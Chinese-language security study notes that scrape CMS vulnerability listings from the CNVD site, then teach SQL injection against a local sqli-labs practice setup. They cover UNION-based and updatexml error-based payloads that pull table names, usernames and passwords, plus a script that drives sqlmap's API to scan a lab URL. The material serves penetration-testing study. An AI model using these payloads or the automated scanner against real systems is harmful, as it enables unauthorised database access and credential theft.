获取该网站漏洞列表,关于CMS
打开burpsuie
打开(搜索到cms结果页面的)要爬取页面
开启intercept,重新加载网页
多点几个下一页,观察burpsuite
发现post请求原数据为
这个样子
POST /flaw/list.htm?flag=true HTTP/1.1
Host: www.cnvd.org.cn
Connection: close
Content-Length: 385
Cache-Control: max-age=0
Origin: https://www.cnvd.org.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate
=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&
baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope
=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&
positionIdStr=&max=20&offset='''
查看网页源码找规律
利用正则表达式找到a标签下的href标签
获取第一页所有漏洞列表
循环获取前5页的漏洞列表
# -*-coding:utf-8-*-
import hackhttp
from bs4 import BeautifulSoup as BS
import re
def CMS(raw):
url = 'https://www.cnvd.org.cn/flaw/list.htm?flag=true'
hh = hackhttp.hackhttp()
code, head, html, redirect_url, log = hh.http(url=url, raw=raw)
# print code
# print html
soup = BS(html, 'lxml')
CMS_html = soup.body
# print CMS_html
CMS_BUGS = BS(str(CMS_html), 'lxml')
# print CMS_BUGS
BUGS = CMS_BUGS.find_all(name='a', attrs={'href': re.compile('/flaw/show/CNVD-.*?')})
for BUG in BUGS:
print BUG['title']
raw_start = '''
POST /flaw/list.htm?flag=true HTTP/1.1
Host: www.cnvd.org.cn
Connection: close
Content-Length: 385
Cache-Control: max-age=0
Origin: https://www.cnvd.org.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&positionIdStr=&max=20&offset='''
for pages_count in range(0, 101, 20):#表示[0,100],每循环一次,加上20
raw = raw_start + str(pages_count)
# print raw
CMS(raw)
sql注入实例教学
sql注入
数字型注入
1 or 1=1 -- 1
1 or 1=1 #
字符型注入
1' o 1=1 -- 1
1' o 1=1 #
基于联合查询的注入
1. 通过联合查询,确定列数
select id,username from users union select 1,2;
2. 通过联合查询,获取当前数据库名以及版本
select id,username from users union select database(),version();
3. 利用内置数据库information_schema中的TABLES表获取指定数据库的所有表名
select id,username from users where id=-1 union select TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security';
4. 利用内置数据库information_schema中的COLUMN_NAME表获取的对应表的列名
select id,username from users where id=-1 union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users';
5. 获取对应表的数据
select id,username from users where id=-1 union select id,username from users;
获取表信息
http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1; -- 1
获取列信息
http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users' limit 0,1; -- 1
获取表数据
http://127.0.0.1/sqli/Less-2/?id=100 union select id,username,password from users; -- 1
基于函数报错的注入
and updatexml(1,version(),0)#
完整显示版本名
and updatexml(1,concat(0x7e,version()),0)
获取表名
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0)
ERROR 1242 (21000): Subquery returns more than 1 row
获取表名
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0)
获取列表
and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1)),0)#
获取数据
and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#
and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
更多的请查看sql注入闯关游戏文档
深入了解SQLMAP API
geturl.py
#coding=utf-8
from bs4 import BeautifulSoup
import hackhttp
# 1. 定义url, 访问url,获取html内容
url = "http://192.168.131.149/sqli/"
hh = hackhttp.hackhttp()
code, head, html, redirect_url, log = hh.http(url)
# 2. 解析html内容, 使用lxml解析器
soup = BeautifulSoup(html, "lxml");
content = soup.find_all('map',id='fm_imagemap') #尝试获取节点,因为calss和关键字冲突,所以改名class_
print content
# 3. 从解析的网页对象中获取对应的内容
for k in soup.find_all('area'):#,找到div并且class为pl2的标签
print(url+ k['href'] + '?id=1') #取第一组的span中的字符串
autosqli.py
#coding=utf-8
import requests
import json
logo = "======auto sqli tools====== "
print(logo)
def sqlmap(host):
urlnew="http://127.0.0.1:8775/task/new"
urlscan="http://127.0.0.1:8775/scan/"
headers={"user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"}
# 创建一个新任务
pd=requests.get(url=urlnew,headers=headers)
print('[*]New task')
# 获取返回的json数据,读取taskid
jsons=pd.json()
print("[*]id:",jsons['taskid'])
print("[*]success:",jsons["success"])
id=jsons['taskid']
# 使用taskid以及要扫描的url,构建数据
scan=urlscan+id+"/start"
print("[*]scanurl:",scan)
data=json.dumps({"url":"{}".format(host)})
headerss={"Content-Type":"application/json"}
# 向sqlmapapi服务器发出请求,等到扫描结果
scans=requests.post(url=scan,headers=headerss,data=data)
# 获取扫描状态
swq=scans.json()
print('--------scan-----------')
print('[*]scanid:',swq["engineid"])
print('[*]scansuccess:',swq["success"])
print('--------status---------')
status="http://127.0.0.1:8775/scan/{}/status".format(id)
print(status)
# 循环等待扫描结果
while True:
ret=requests.get(url=status,headers=headers)
# 当 status = terminated 即为扫描结束
if ret.json()['status'] == 'terminated':
# 获取扫描结果
datas=requests.get(url='http://127.0.0.1:8775/scan/{}/data'.format(id))
dat=datas.json()['data']
print('[*]data:',dat)
break
elif ret.json()['status'] == 'running':
continue
sqlmap("http://192.168.131.149/sqli/Less-1/?id=1")
https://www.freebuf.com/articles/web/204875.html
深入了解SQLMAP API.pdf
相关命令:
python sqlmapapi.py -s
python sqlmapapi.py -c